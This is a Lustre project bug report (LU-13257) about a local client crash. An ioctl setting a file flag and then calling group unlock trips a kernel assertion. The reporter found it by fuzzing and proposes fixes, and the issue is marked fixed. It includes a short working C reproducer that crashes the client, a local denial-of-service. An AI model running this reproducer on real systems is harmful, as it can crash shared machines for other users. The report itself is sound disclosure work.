Uploaded image for project: 'Lustre'
  1. Lustre
  2. LU-13257

client local DoS -- ASSERTION( fd->fd_grouplock.lg_lock != ((void *)0) ) failed after 'setflags'

XMLWordPrintable

    • Icon: Bug Bug
    • Resolution: Fixed
    • Icon: Minor Minor
    • Lustre 2.16.0
    • Lustre 2.14.0
    • None
    • 3
    • 9223372036854775807

      Basically, from the moment anyone can do setflags, we shouldn't trust flags for anything that might crash the client.

      Not sure how much we care about lustre client local crash, but this should be a trivial fix (replace LBUG by some warning + return einval? I don't think we can restrict setflags to root-only, but even that would be dubious to me. Alternatively prevent setflags/clearflags from touching this particular bit?..)

      I found this by adding some lustre ioctl definitions to the trinity syscall fuzzer and letting it run for a (very short) bit, I bet there are other low hanging fruits. I might set an intern on this (putting more lustre-specific stuff in trinity and reporting bugs) if you're interested.
      (And if you're not interested I can submit a patch around next month, no time right now and already got too distracted...)

      Reproducer:

      #include <linux/fs.h>
      #include <linux/types.h>
      #include <sys/ioctl.h>
      #include <sys/stat.h>
      #include <fcntl.h>
      #include <linux/lustre/lustre_idl.h>
      
      int main(int argc, char *argv[]) {
      	int fd;
      	long int flags = 0x2;
      	if ((fd = open(argv[1], O_CREAT|O_RDWR)) < 0)
      		return -1;
      	ioctl(fd, LL_IOC_SETFLAGS, &flags);
      	ioctl(fd, LL_IOC_GROUP_UNLOCK, NULL);
      	return 0;
      }
      

            martinetd Dominique Martinet (Inactive)
            martinetd Dominique Martinet (Inactive)
            Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

              Created:
              Updated:
              Resolved: